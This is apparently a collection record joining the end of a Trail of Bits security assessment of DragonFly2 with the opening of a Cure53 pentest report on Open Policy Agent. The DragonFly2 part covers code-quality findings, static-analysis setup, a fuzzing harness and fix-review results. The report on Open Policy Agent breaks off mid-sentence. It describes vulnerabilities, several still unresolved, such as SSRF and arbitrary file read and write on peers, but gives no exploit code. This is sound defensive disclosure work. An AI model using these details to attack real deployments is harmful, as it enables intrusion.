\"\\n\" + opt.CACert \n mergedOptions.TLSVerify = opt.TLSVerify || security.TLSVerify \n Figure C.1.1: Redundant variable declaration \n ( Dragonfly2/client/daemon/daemon.go#364–368 ) \n 2. URLs are parsed with regexes and string methods. Instead, use a dedicated APIs \n like net/url . \n fileds := strings.Split(polished[ 0 ], \",\" ) \n host := strings.Split(fileds[ 0 ], \"=\" )[ 1 ] \n query := strings.Join(fileds[ 1 :], \"&\" ) \n return fmt.Sprintf( \"%s?%s\" , host, query) \n Figure C.2.1: Example code handling a URL with strings methods \n ( Dragonfly2/manager/job/preheat.go#314–317 ) \n func parseAccessURL(url string ) (*preheatImage, error ) { \n r := accessURLPattern.FindStringSubmatch(url) \n if len (r) != 5 { \n return nil , errors.New( \"parse access url failed\" ) \n } \n Figure C.2.2: Example code handling an URL with a regex \n ( Dragonfly2/manager/job/preheat.go#324–328 ) \n 3. Deprecated os.Is * family of functions is used. Instead, use the errors.Is \n function. \n if err := os.MkdirAll(t.dataDir, dataDirMode); err != nil && !os.IsExist(err) { \n Figure C.3.1: An example use of deprecated os.Is* methods family \n ( Dragonfly2/client/daemon/storage/storage_manager.go#427 ) \n Trail of Bits 61 DragonFly2 Security Assessment \n P U B L I C \n } else if os.IsPermission(err) || dir == \"/\" { \n Figure C.3.2: Another example of using deprecated os.Is* methods family \n ( Dragonfly2/client/config/dfcache.go#228 ) \n 4. Redundant nil check in unmarshal method. The err can be simply returned. \n if err != nil { \n return err \n } \n return nil \n Figure C.4.1: The redundant if statement \n ( Dragonfly2/client/util/types.go#122–125 ) \n 5. The ioutil.ReadFile and ioutil.ReadDir methods are deprecated. \n However, they are used in multiple places. \n data, err := ioutil.ReadFile(file) \n Figure C.5.1: An example use of deprecated ioutil.ReadFile method \n ( Dragonfly2/cmd/dependency/dependency.go#203 ) \n 6. The fmt.Sprintf method is used to concatenate the IP host and port in \n multiple places. Instead, use the net.JoinHostPort function. \n func NewDfstore() *DfstoreConfig { \n url := url.URL{ \n Scheme: \"http\" , \n Host: fmt.Sprintf( \"%s:%d\" , \"127.0.0.1\" , \n DefaultObjectStorageStartPort), \n } \n Figure C.6.1: an example use of fmt.Sprintf method to concatenate host and port \n ( Dragonfly2/client/config/dfstore.go#44–48 ) \n 7. An unchecked type assertion is used in multiple places. For example, in the \n ClientDaemon.Serve method, the type assertion may panic if the cfg variable \n does not represent a valid config.DaemonOption structure. Either use checked \n assertions instead, or make sure that unchecked type assertions never fail. \n daemonConfig := cfg.(*config.DaemonOption) \n Trail of Bits 62 DragonFly2 Security Assessment \n P U B L I C \n Figure C.7.1: An example of unchecked type assertion \n ( Dragonfly2/client/daemon/daemon.go#776 ) \n return rawPeer.(*Peer), loaded \n Figure C.7.2: Another example of unchecked type assertion \n ( Dragonfly2/scheduler/resource/host.go#362 ) \n 8. Code copied from other repositories or from Go standard packages are not up \n to date. For example, the ParseRange function seem s to miss the fix for Range \n headers with double negative sign (see issue #40940 ). Update the copy-pasted code \n and design a process to keep the code in sync with the upstream. \n // copy from go/1.15.2 net/http/fs.go ParseRange \n func ParseRange(s string , size int64 ) ([]Range, error ) { \n Figure C.8.1: An example non-updated method \n ( Dragonfly2/pkg/net/http/range.go#63–64 ) \n 9. Hard-coded strings are used instead of constants. For example, in a few places \n the bytes= string is used, but in other places, the http.RangePrefix constant is \n used. We recommend defining and using constants whenever possible. \n urlMeta.Range = strings.TrimLeft(r, http.RangePrefix) \n Figure C.9.1: An example use of a constant \n ( Dragonfly2/scheduler/job/job.go#175 ) \n rg = strings.TrimLeft(r, \"bytes=\" ) \n Figure C.9.2: An example use of hard-coded string literal \n ( Dragonfly2/client/dfget/dfget.go#226 ) \n 10. Incorrect comment in scheduler/evaluator code. In the code shown in figure \n C.10.1, the highlighted comment says that the output ranges from 0 to unlimited. \n However, the output actually ranges only from 0 to 1. \n // calculateParentHostUploadSuccessScore 0.0~unlimited larger and better. \n func calculateParentHostUploadSuccessScore(peer *resource.Peer) float64 { \n uploadCount := peer.Host.UploadCount.Load() \n uploadFailedCount := peer.Host.UploadFailedCount.Load() \n if uploadCount < uploadFailedCount { \n return minScore \n } \n // Host has not been scheduled, then it is scheduled first. \n Trail of Bits 63 DragonFly2 Security Assessment \n P U B L I C \n if uploadCount == 0 && uploadFailedCount == 0 { \n return maxScore \n } \n return float64 (uploadCount-uploadFailedCount) / float64 (uploadCount) \n } \n Figure C.10.1: Function with incorrect comment \n ( Dragonfly2/scheduler/scheduling/evaluator/evaluator_base.go#109-123 ) \n 11. Repeated code. In client/daemon/peer/peertask_bitmap.go , the NewBitmap \n and NewBitmapWithCap functions are nearly identical. The implementation of \n NewBitmap could be replaced with a call to NewBitmapWithCap(8) . \n 12. Incorrect comment in proxy code. In the following code snippet, the if statement \n checks only whether resp.ContentLength is -1 , but the comment implies that a 0 \n check should be done as well: \n // when resp.ContentLength == -1 or 0, byte count can not be updated by transport \n if resp.ContentLength == - 1 { \n metrics.ProxyRequestBytesCount.WithLabelValues(req.Method).Add( float64 (n)) \n } \n Figure C.12.1: Code with incorrect comment \n ( Dragonfly2/client/daemon/proxy/proxy.go#409-412 ) \n 13. Bitmap functions are easy to misuse. Functions on the bitmap data structure \n defined in Dragonfly2/client/daemon/peer/peertask_bitmap.go are easy to \n misuse in a way that can cause security vulnerabilities. The following usage \n instructions should be documented in comments: \n ○ Call Set or Sets only when the current value(s) are false to avoid \n invalidating the settled value. \n ○ Do not call Sets with duplicate entries to avoid invalidating the settled \n value. \n ○ Call Clean only when the current value is true to avoid invalidating the \n settled value, accidentally setting the value to true , or causing an \n out-of-bounds access panic. \n ○ Use a mutex to protect calls to Set , Clean , Sets , and IsSet . A mutex is not \n needed when calling Settled . \n ○ Do not call any function with negative index arguments. \n Trail of Bits 64 DragonFly2 Security Assessment \n P U B L I C \n ○ Do not call NewBitmapWithCap(0) , since calling Set on the resulting bitmap \n will cause an infinite loop. \n We did not notice any incorrect usage of the bitmap functions in the current \n Dragonfly codebase. \n Trail of Bits 65 DragonFly2 Security Assessment \n P U B L I C \n D. Automated Static Analysis \n This appendix describes the setup of the automated analysis tools used during this audit. \n Though static analysis tools frequently report false positives, they detect certain categories \n of issues, such as memory leaks, misspecified format strings, and the use of unsafe APIs, \n with essentially perfect precision. We recommend periodically running these static analysis \n tools and reviewing their findings. \n Semgrep \n To install Semgrep, we used pip by running python3 -m pip install semgrep . We used \n version 1.32.0 of the Semgrep. To run Semgrep on the codebase, we ran the following in \n the root directory of the project: \n semgrep --config \"p/trailofbits\" --sarif --metrics=off --output \n semgrep.sarif \n We also ran the tool with the following rules (configs): \n ● p/golang \n ● p/semgrep-go-correctness \n ● p/r2c-security-audit \n ● https://semgrep.dev/p/gosec \n We recommend integrating Semgrep into the project's CI/CD pipeline. Integrate at least the \n rules with HIGH confidence and the rules with MEDIUM confidence and HIGH impact. \n In addition to the three configurations listed above, we recommend using Trail of Bits’ set \n of Semgrep rules (from the repository, or less preferably, from the registry ) and dgryski \n rules . \n CodeQL \n We installed CodeQL by following CodeQL's installation guide . We used CodeQL version \n 2.13.3, with Go version 1.20.6. \n After installing CodeQL, we ran the following command to create the project database for \n the DragonFly2 repository: \n codeql database create codeql.db -l go \n We then ran the following command to query the database: \n codeql database analyze ./codeql.db --format=sarif-latest -o \n codeql.sarif -- go-security-and-quality.qls \n Trail of Bits 66 DragonFly2 Security Assessment \n P U B L I C \n We used the go-security-and-quality , go-security-experimental , and custom \n Trail of Bits query packs. \n Although the CodeQL tool is used in DragonFly2’s CI pipeline, the tool found dozens of \n issues. This may be due to usage of experimental and custom rules, because of weak \n configuration of the tool in the pipeline, or because findings reported in the pipeline were \n not fixed. \n Other static analysis tools \n Although the only SAST tools used during the audit were Semgrep and CodeQL, we \n recommend using the following tools, either in an ad-hoc manner or by integrating them \n into the CI/CD pipeline: \n ● golangci-lint : This tool is a wrapper around various other tools (some but not all \n of which are listed below). \n ● Go-sec is a static analysis utility that looks for a variety of problems in Go \n codebases. Notably, go-sec will identify potential stored credentials, unhandled \n errors, cryptographically troubling packages, and similar problems. \n ● Go-vet is a very popular static analysis utility that searches for more go -specific \n problems within a codebase, such as mistakes pertaining to closures, marshaling, \n and unsafe pointers. Go-vet is integrated within the go command itself, with \n support for other tools through the vettool command line flag. \n ● Staticcheck is a static analysis utility that identifies both stylistic problems and \n implementation problems within a Go codebase. Note that many of the stylistic \n problems that staticcheck identifies are also indicative of potential “problem \n areas” in a project. \n ● Ineffassign is a static analysis utility that identifies ineffectual assignments. These \n ineffectual assignments often identify situations in which errors go unchecked, \n which could lead to undefined behavior of the program due to execution in an \n invalid program state. \n ● Errcheck is a static analysis utility that identifies situations in which errors are not \n handled appropriately. \n ● GCatch contains a suite of static detectors aiming to identify concurrency bugs in \n large, real Go software systems. \n Please also see our blog post on Go security assessment techniques for further discussion \n of the Go-related analysis tools. \n Trail of Bits 67 DragonFly2 Security Assessment \n P U B L I C \n E. Automated Dynamic Analysis \n This appendix describes the setup of the automated dynamic analysis tools and test \n harnesses used during this audit. \n The purpose of automated dynamic analysis \n In most software, unit and integration tests are typically the extent to which testing is \n performed. This type of testing detects the presence of functionality, allowing developers \n to ensure that the given system adheres to the expected specification. However, these \n methods of testing do not account for other potential behaviors that an implementation \n may exhibit. \n Fuzzing and property-based testing complement both unit and integration testing by \n identifying deviations in the expected behavior of a component of a system. These types of \n tests generate test cases and provide them to the given component as input. The tests then \n run the components and observe their execution for deviations from expected behaviors. \n The primary difference between fuzzing and property testing is the method of generating \n inputs and observing behavior. Fuzzing typically attempts to provide random or randomly \n mutated inputs in an attempt to identify edge cases in entire components. Property testing \n typically provides inputs sequentially or randomly within a given format, checking to ensure \n a specific property of the system holds upon each execution. \n By developing fuzzing and property-based testing alongside the traditional set of unit and \n integration tests, edge cases and unintended behaviors can be pruned during the \n development process, which will likely improve the overall security posture and stability of \n a system. \n Tooling \n Go supports fuzzing in its standard toolchain beginning in Go 1.18. However, we \n recommend considering the Trail of Bits fork of go-fuzz that fixes type alias issues, adds \n dictionary support, and provides new mutation strategies. Moreover, we recommend using \n our helper tools for efficiency and better experience: \n ● Go-fuzz-prepare : a utility for automatic generation of go-fuzz fuzzing harnesses for \n various functions \n ● go-fuzz-utils : a helper package that provides a simple interface to produce random \n values for various data types and can recursively populate complex structures from \n raw fuzz data \n Trail of Bits 68 DragonFly2 Security Assessment \n P U B L I C \n Setup and execution \n First, copy the harness to the client/daemon/rpcserver/rpcserver_test.go file. \n Then, inside directory with the file, run the following command: \n go test -fuzz ^\\QFuzzTestGrpcToB\\E$ -run ^$ \n where FuzzTestGrpcToB is the name of a function that receives as argument pointer to \n testing.F . This command will start a fuzzer that will run until a first error is detected. \n To debug a single input created by the fuzzer, run: \n go test -run=FuzzTestGrpcToB/<filename> \n where <filename> is the name of a file that can be found in the seeds directory—that is, \n inside the ./client/daemon/rpcserver/testdata/fuzz/FuzzTestGrpcToB . \n To get coverage of the fuzzing test, back up seeds, and replace them with the internal \n fuzzer’s inputs: \n cp -rf <seeds directory> ./seeds_backup \n ln -s \"$(go env \n GOCACHE)/fuzz/d7y.io/dragonfly/v2/client/daemon/rpcserver/FuzzTes \n tGrpcToB\" <seeds directory> \n The internal fuzzer’s data is simply a set of “interesting” files: files that, when provided to \n the fuzzing harness as an input, generate new coverage that was not generated by other \n inputs. \n Now run the FuzzTestGrpcToB as a normal test with coverage gathering options (e.g., \n golang’s -cover flag). \n Sample harnesses \n Below we provide a draft of the fuzzing harness created during the audit. The code in figure \n E.1 implements a fuzz test for the Download method of the dfget daemon gRPC service. It \n sets up a local gRPC server (using the same code as the TestServer_ServeDownload \n test), then creates a gRPC client and uses it to call the server with random data. If the \n server panics, then the client receives an error with codes.Internal code (because there \n is a recovery handler used in the gRPC server). \n Please note that the harness is a very simple one, and not very effective. It is slow (about \n 3,000 executions per second) because of communication over the Unix socket. It is only a \n demonstration of how a fuzzing harness can be constructed and used. \n Trail of Bits 69 DragonFly2 Security Assessment \n P U B L I C \n func FuzzTestGrpcToB(f *testing.F) { \n assert := testifyassert.New(f) \n ctrl := gomock.NewController(f) \n defer ctrl.Finish() \n mockPeerTaskManager := peer.NewMockTaskManager(ctrl) \n srv := &server{ \n KeepAlive: util.NewKeepAlive( \"test\" ), \n peerHost: &schedulerv1.PeerHost{}, \n peerTaskManager: mockPeerTaskManager, \n } \n socketDir, err := ioutil.TempDir(os.TempDir(), \"d7y-test-***\" ) \n assert.Nil(err, \"make temp dir should be ok\" ) \n socket := path.Join(socketDir, \"rpc.sock\" ) \n defer os.RemoveAll(socketDir) \n if srv.healthServer == nil { \n srv.healthServer = health.NewServer() \n } \n srv.downloadServer = dfdaemonserver.New(srv, srv.healthServer) \n srv.peerServer = dfdaemonserver.New(srv, srv.healthServer) \n ln, err := net.Listen( \"unix\" , socket) \n assert.Nil(err, \"listen unix socket should be ok\" ) \n go func () { \n if err := srv.ServeDownload(ln); err != nil { \n f.Error(err) \n } \n }() \n netAddr := &dfnet.NetAddr{ \n Type: dfnet.UNIX, \n Addr: socket, \n } \n client, err := dfdaemonclient.GetInsecureV1(context.Background(), \n netAddr.String()) \n assert.Nil(err, \"grpc dial should be ok\" ) \n f.Fuzz( func (t *testing.T, uu, url, output, tag, filter, rang, digest string , \n bs, koo, rec bool , uid, gid int64 ) { \n request := &dfdaemonv1.DownRequest{ \n Uuid: uu, \n Url: url, \n Output: output, \n DisableBackSource: bs, \n UrlMeta: &commonv1.UrlMeta{ \n Tag: tag, \n Filter: filter, \n Range: rang, \n Digest: digest, \n }, \n Uid: uid, \n Trail of Bits 70 DragonFly2 Security Assessment \n P U B L I C \n Gid: gid, \n KeepOriginalOffset: koo, \n Recursive: rec, \n } \n stream, err := client.Download(context.TODO(), request) \n if err != nil { \n // client-side error, skip \n return \n } \n _, err = stream.Recv() \n if err != nil && status.Code(err) == codes.Internal { \n t.Error(err) \n } \n }) \n } \n Figure E.1: An example fuzzing harness \n Trail of Bits 71 DragonFly2 Security Assessment \n P U B L I C \n F. Fix Review Results \n When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues \n identified in the original report. This work involves a review of specific areas of the source \n code and system configuration, not comprehensive analysis of the system. \n On August 18, 2023, Trail of Bits reviewed the fixes and mitigations implemented by the \n DragonFly2 team for the issues identified in this report. We reviewed each fix to determine \n its effectiveness in resolving the associated issue. \n In summary, of the 19 issues described in this report, DragonFly2 has resolved 11 issues, \n has partially resolved five issues, and has not resolved the remaining three issues. For \n additional information, please see the Detailed Fix Review Results below. \n ID Title Status \n 1 Authentication is not enabled for some Manager’s endpoints Partially \n Resolved \n 2 Server-Side Request Forgery vulnerabilities Partially \n Resolved \n 3 Manager makes requests to external endpoints with disabled TLS \n authentication Resolved \n 4 Incorrect handling of a task structure’s usedTraffic field Resolved \n 5 Directories created via os.MkdirAll are not checked for permissions Partially \n Resolved \n 6 Slicing operations with hard-coded indexes and without explicit length \n validation Resolved \n 7 Files are closed without error check Resolved \n 8 Timing attacks against Proxy’s basic authentication are possible Resolved \n Trail of Bits 72 DragonFly2 Security Assessment \n P U B L I C \n 9 Possible panics due to nil pointer dereference, when using variables \n created alongside an error Resolved \n 10 TrimLeft is used instead of TrimPrefix Resolved \n 11 Vertex.DeleteInEdges and Vertex.DeleteOu tEdges functions are not \n thread safe Unresolved \n 12 Arbitrary file read and write on a peer machine Partially \n Resolved \n 13 Manager generates mTLS certificates for arbitrary IP addresses Unresolved \n 14 gRPC requests are weakly validated Partially \n Resolved \n 15 Weak integrity checks for downloaded files Unresolved \n 16 Invalid error handling, missing return statement Resolved \n 17 Tiny file download uses hard coded HTTP protocol Resolved \n 18 Incorrect log message Resolved \n 19 Usage of architecture-dependent int type Resolved \n Trail of Bits 73 DragonFly2 Security Assessment \n P U B L I C \n Detailed Fix Review Results \n TOB-DF2-1: Authentication is not enabled for some Manager’s endpoints \n Partially resolved in PR 2583 and PR 2590 . New endpoints for creation and management of \n personal access tokens were created. The endpoints are protected with RBAC, as they were \n for other authenticated endpoints. Generated tokens are stored in the database. A new \n middleware was added that checks if a token provided with a request is in the database. \n There are new job endpoints that mimic the behavior of the old job endpoints but are \n protected with the new middleware. In other words, a new authentication mechanism was \n added to the system and it is used to protect newly created endpoints. \n However, the unauthenticated endpoints reported in the finding are still accessible to \n users; these were neither removed nor protected with RBAC or the new middleware. \n Moreover, the newly implemented feature is vulnerable to timing attacks. Requests to the \n database for token retrieval are not constant time. We recommend to resolve this issue by \n either (in order of security of the recommendation): \n 1. Storing the personal access tokens protected with hash-based message \n authentication codes (HMACs). That is, instead of storing a raw token, store \n HMAC(key, token) . The key should be a constant server-side secret key. Then \n perform the lookup on the HMAC when a user supplies a token. \n 2. Prefixing a token with a unique index and storing the index alongside the token in \n the database (preferably in a new column). Then, for every user’s request, perform a \n database lookup to retrieve a token (this only compares the indexes), and then \n compare the retrieved token with the user-provided token using a constant-time \n comparison function. \n TOB-DF2-2: Server-side request forgery vulnerabilities \n Partially resolved in PR 2611 . Only one SSRF attack vector was mitigated. The previously \n vulnerable preheat endpoint handlers now use a secure version of the HTTP client that \n allows requests only to IP addresses that are of global unicast type and are not private. The \n vulnerable pieceManager.DownloadSource method was not fixed. The attack vector via \n HTTP redirects was not fixed. \n TOB-DF2-3: Manager makes requests to external endpoints with disabled TLS \n authentication \n Resolved in PR 2612 . Configuration options were added to the preheat endpoints, \n enabling users to provide Certificate Authorities for TLS connections. \n TOB-DF2-4: Incorrect handling of a task structure’s usedTraffic field \n Resolved in PR 2634 . The usedTraffic field is now correctly updated in the \n processPieceFromSource method. \n Trail of Bits 74 DragonFly2 Security Assessment \n P U B L I C \n TOB-DF2-5: Directories created via os.MkdirAll are not checked for permissions \n Partially resolved in PR 2613 . Files and directories permissions were made more restrictive. \n However, the main vulnerability reported—lack of pre-existence or post-verification checks \n for newly created files and directories—was not addressed. \n TOB-DF2-6: Slicing operations with hard-coded indexes and without explicit length \n validation \n Resolved in PR 2636 . Explicit length validations were added to the reported vulnerable \n methods. \n TOB-DF2-7: Files are closed without error check \n Resolved in PR 2599 . Deferred methods checking for errors on files close were added. \n TOB-DF2-8: Timing attacks against Proxy’s basic authentication are possible \n Resolved in PR 2601 . A constant-time comparison is now used to perform basic \n authentication in the Proxy. \n TOB-DF2-9: Possible panics due to nil pointer dereference when using variables \n created alongside an error \n Resolved in PR 2602 . Both instances of the vulnerability were fixed by replacing the \n potentially-nil variables with not-nil ones. Other instances of the vulnerability were either \n not found or not looked for. \n TOB-DF2-10: TrimLeft is used instead of TrimPrefix \n Resolved in PR 2603 . Calls to the TrimLeft method were replaced with calls to the \n TrimPrefix . \n TOB-DF2-11: Vertex.DeleteInEdges and Vertex.DeleteOutEdges functions are not \n thread safe \n Unresolved in PR 2614 . A new per-vertex mutex is added. It is used to synchronize access \n to a single vertex in calls to the Vertex.DeleteInEdges and Vertex.DeleteOutEdges \n methods. However, the reported vulnerability regards a race condition that results in an \n invalid state between two (or more) vertices, not the invalid state of a single vertex. \n The original recommendation of using DAG’s mutex (instead of a new, per-vertex mutex) \n still applies. \n TOB-DF2-12: Arbitrary file read and write on a peer machine \n Partially resolved in PR 2637 . The implemented fix disallows users to override already \n existing files using the ExportTask endpoint. This mitigates the impact of the vulnerability, \n making it harder for adversaries to gain remote code execution capabilities. However, the \n root of the vulnerability was not resolved. It is still possible to access, read, and write \n arbitrary files on peers’ machines. \n Trail of Bits 75 DragonFly2 Security Assessment \n P U B L I C \n The DragonFly2 team indicated that an allowlist for files will be implemented in the future. \n TOB-DF2-13: Manager generates mTLS certificates for arbitrary IP addresses \n Unresolved in PR 2615 . The code that was marked with TODO comments was removed, \n instead of being fixed to resolve the vulnerability. The vulnerability still exists. \n TOB-DF2-14: gRPC requests are weakly validated \n Partially resolved in PRs 163 , 164 , 165 , 2616 . The url_meta fields were marked as \n required. The digest fields are now validated with a regex that checks hashes lengths. \n However, the regex has a typo bug that should be fixed. \n TOB-DF2-15: Weak integrity checks for downloaded files \n Unresolved. The vulnerability was not resolved in any of the provided pull requests. \n TOB-DF2-16: Invalid error handling, missing return statement \n Resolved in PR 2610 . Missing return statements were added. \n TOB-DF2-17: Tiny file download uses hard coded HTTP protocol \n Resolved in PR 2617 . The protocol and TLS configuration used for tiny file downloads were \n made configurable. \n TOB-DF2-18: Incorrect log message \n Resolved in PR 2618 . The incorrect error messages were changed so that they provide \n unambiguous information to users. \n TOB-DF2-19: Usage of architecture-dependent int type \n Resolved in PR 2619 . The example instance of the issue was fixed by replacing int type \n with int64 . Other instances of the vulnerability were either not present or not looked for. \n Trail of Bits 76 DragonFly2 Security Assessment \n P U B L I C \n G. Fix Review Status Categories \n The following table describes the statuses used to indicate whether an issue has been \n sufficiently addressed. \n Fix Status \n Status Description \n Undetermined The status of the issue was not determined during this engagement. \n Unresolved The issue persists and has not been resolved. \n Partially Resolved The issue persists but has been partially resolved. \n Resolved The issue has been sufficiently resolved. \n Trail of Bits 77 DragonFly2 Security Assessment \n P U B L I C \n" } ]
{ "category": "Provisioning", "file_name": "SECURITY_AUDIT.pdf", "project_name": "Open Policy Agent (OPA)", "subcategory": "Security & Compliance" }
[ { "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPentest-Report Open Policy Agent 08.2018\nCure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. N. Krein, BSc. J. Hector, Dipl.-Ing. A. Aranguren,\nDipl.-Ing. A. Inführ\nIndex\nIntroduction\nScope\nTest Methodology\nPart 1. Manual Code Auditing and Documentation Review\nPart 2 (Code-Assisted Penetration Testing)\nIdentified Vulnerabilities\nOPA-01-001 Server: Insecure Default Config allows to bypass Policies (Medium)\nOPA-01-005 Server: OPA Query Interface is vulnerable to XSS (High)\nMiscellaneous Issues\nOPA-01-002 Server: Query Interface can be abused for SSRF (Medium)\nOPA-01-003 Server: Unintended Behavior due to unclear Documentation (Medium)\nOPA-01-004 Server: Denial of Service via GZip Bomb in Bundle (Info)\nOPA-01-006 Server: Path Mismatching via HTTP Redirects (Info)\nConclusions\nIntroduction\n“The Open Policy Agent (OPA) is an open source, general-purpose policy engine that\nenables unified, context-aware policy enforcement across the entire stack. OPA is\nhosted by the Cloud Native Computing Foundation (CNCF) as a sandbox level project.”\nFrom https://github.com/open-policy-agent/opa\nThis report documents the results of a security assessment against the Open Policy\nAgent (OPA) framework. The project, which entailed both a penetration test and a\nsource code audit of the OPA compound, was carried out by Cure53 in August 2018 and\nyielded six security-relevant discoveries. It is crucial to underscore that the assessment\nwas sponsored by The Linux Foundation / CNCF and constitutes one of a growing\nnumber of security-centric projects targeting the CNCF-related software and\ncommissioned by the funders to the Cure53 team.\nCure53, Berlin · 08/30/18 1/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIt needs to be noted that the OPA framework is almost entirely written in Go and this had\na bearing on the employed approaches and personnel resources. From the Cure53\nteam, six testers were tasked with the completion of the project. In terms of time, a total\nof eighteen days were invested into the assessment and allocated primarily to testing\nand auditing, as well as to reporting and documentation.\nThe Cure53 team investigated the OPA framework through a range of methods,\nreviewing the scoped source code and pentesting a reference implementation made\navailable by the software maintainers. Notably, OPA can be deployed and used in two\ndifferent ways, either as daemon or as a library. With this knowledge, Cure53 honed in\non examining both deployment routes after receiving all necessary information from the\nmaintainers’ side. The white-box approach of this test relates to the fact that all relevant\nOPA sources are available on GitHub so everything of note could be used for testing\nand added to the scope. Nevertheless, one item - the control panel - was excluded from\nthe list of test-targets. While this item was not investigated, it was utilized for testing.\nThe tests generally proceeded on schedule and the Cure53 team strongly believes that\na good coverage has been reached on the scope. Throughout the assessment, the\ncommunications were done on Slack and the OPA maintainers invited Cure53 into a\ndedicated private channel. All emerging questions posed by the testers were answered\nby the OPA team in a prompt, precise and comprehensive manner. Significantly, no live-\nreporting was requested by the OPA maintainers, meaning that Cure53 only reported the\nheadlines of the findings during the test.\nAs far as the array of six findings is concerned, two problems were categorized as\nsecurity vulnerabilities and four as general weaknesses. On the one hand, one finding\nwas given a rather concerning “ High”-severity ranking. On the other hand, most of the\nspotted issues had lesser implications. Furthermore, not a single flaw has been recorded\nas “Critical” in terms of impact and the overall number of findings should be seen as\nacceptable.\nIn the following sections, the report will first elaborate on the scope and then offers a\ndedicated, highly detailed section on the Test Methodology in order to enable tracking of\nprogress and coverage to the funders and maintainers alike. Next, each finding is\nseparately discussed together with its technical background and mitigation options.\nLastly, Cure53 delivers some broader conclusion notes in the closing section. In light of\nthe findings, the testing team comments on the security posture of the tested OPA\nframework manifested during this assignment.\nCure53, Berlin · 08/30/18 2/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nScope\n•Open Policy Agent\n◦https://github.com/open-policy-agent/opa \n•Reference setup from OPA\n◦A setup with three hosts, reflecting a common deployment scenario and provided by \nthe OPA maintainers.\n◦Cure53 was given access to both possible ways of implementing OPA, full SSH \naccess was granted to allow better insights and efficient debugging.\nTest Methodology\nPart 1. Manual Code Auditing and Documentation Review\nThis section provides information about the process followed during the first part of the\ntest, highlighting some of the actions taken during the manual code audit against the\nsources of the Open Policy Agent system. Below one can find a list which reflects the\nsignificant efforts made during the assessment. This demonstrates that, despite the\nrelative low number of findings stemming from this test, various strategies and\napproaches were systematically and creatively deployed against the items in the OPA\nscope. Once again, it needs to be reiterated that a good level of coverage was achieved\nby the Cure53 team during this project.\n•The available documentation and deployment instructions were thoroughly\nreviewed for possible weaknesses, any potential for misinterpretation, as well as\nvulnerable examples. For instance, the provided sample apps/APIs were\nchecked to see whether there any common errors could might confuse OPA\nwhen the app extracts request headers and forwards them. The solution\nappeared robust enough and potential issues were discussed as highly\ndependent on the configuration and deployment of the frontend.\n•The OPA source code was reviewed to determine if URL path traversals could\nlead to policy bypasses. This was checked on both the Go and Python examples\nprovided, although they were not exactly in scope. Still, these could demonstrate\nerrors that are typically made during writing of the frontend code.\n•The application source code of OPA was reviewed for common data parsing\nflaws, however the application uses JSON instead of XML, hence reducing the\nattack surface substantially. An XSS issue inside the HTML template for the\nindex route via JSON parsing errors was eventually identified and documented\nunder OPA-01-005.\n•The PAM setup was analyzed for MitM (Man-in-the-Middle) potential via\nenvironment variables. It was found that PAM prevents that unless specifically\nCure53, Berlin · 08/30/18 3/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \ntold to use ~/.pam_environment. Similarly, as OPA allows to communicate with\nthe control panel via HTTPs, the code was checked for the presence of\nInsecureSkipVerify, as this would indicate that a setting weakening the SSL\ncertificate parsing exists on the scope.\n•The supplied codebase was also assessed for possible command execution,\nevaluation of code, file handling and other similar pitfalls (i.e. via calls to os.*,\nioutils.*, etc.).\n•The code related to authorization and authentication was reviewed for particular,\nusual flaws in this application areas, resulting in OPA-01-003\n•The available routes were audited to identify weaknesses in the provided built-in\nfunctions of rego. For example, it was attempted to identify endpoints that might\nbe abusable via SSRF or when OPA is directly reachable or not bound to\nlocalhost. This resulted in the SSRF issue described in OPA-01-002. Additionally,\nas OPA permits the use of http.send in the rego language, the source code was\nreviewed for the presence of RegisterProtocol. Having this protocol in place\nwould have allowed adding extra protocols to the HTTP library. However, it was\nconcluded that OPA only supports the default protocols handler.\n•The storage implementation was reviewed for possible security flaws. As OPA\ndoes not use any kind of file storage, it is not possible for an attacker to drop files\nby abusing APIs. In essence, all key actions are done in memory and not the file\nsystem.\n•The source code was additionally reviewed for security issues, focusing on\ncommon sinks, logic flaws and potential to bypass OPA policies.\nPart 2 (Code-Assisted Penetration Testing)\nThe following list notes some of the noteworthy steps undertaken during the second part\nof the test. This component of the project entailed code-assisted penetration testing\nagainst the OPA solution in scope. An analysis at runtime was deemed as an\nappropriate approach to complement the source code audit, thus enabling confirmation\nor verification of the suspected issues. In addition, it made it possible for the testers to\nobserve the application dynamically, together with all its underlying packages and\nlibraries. Some of the specific steps performed during this phase can be consulted in the\nbullet-points list below.\n•OPA offered Cure53 a test website ( cure53.styra.com) to manage the settings.\nAlthough the website itself was out of scope during this engagement, testers\nlogged-in, identified the available functionality and drafted possible attack vectors\nbased on the observed behaviors. This provided a good overview of how OPA is\nsupposed to be deployed in practice.\nCure53, Berlin · 08/30/18 4/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n•OPA was configured and set up locally, following the publicly available\ninstructions1. Multiple attack vectors were then tried against the local setup. For\nexample, a general analysis of the overall PAM/OPA setup resulted in\nidentification of OPA-01-001. Similarly, the PAM module was reviewed for\nmemory corruption issues through a malicious server.\n•The application and APIs were analyzed at runtime, attempting multiple ACL and\nlogic bypasses, as well as common web attack vectors (XSS, RCE, etc.).\nEventually this led to the XSS issue described under OPA-01-005.\n•It was discovered that path parameters in OPA can contain “..” and that the OPA\nweb client supports redirects. However, abusing this design behavior was not\npossible during this assessment.\n•Multiple tests were performed to determine possible weaknesses in\nundocumented functionality of the rego parser used by OPA.\n•Efforts were also made into uncovering data leakage flaws, first by identifying\nareas possibly prone to such flaws and later by attempting to send various\ncrafted payloads to the corresponding functional areas.\n•A number of tests were performed to verify if the defined policy rules could be\nbypassed. This focused on query information sent to the simple query API, which\nwas used by the example applications. Additionally, various tests were carried\nout to determine if path mismatches could be potentially exploited in certain\nscenarios. This also included a check to reach OPA endpoints which would leak\npolicy information whilst the API should not be reachable. The internally parsing\nof the received paths did not allow such behaviors.\n•The Go HTTP server exclusively supports standard protocols, like HTTP/HTTPS,\nbased on common Go libraries. It generally offers very little opportunity for\npossible security issues. However, it was noted that gzip 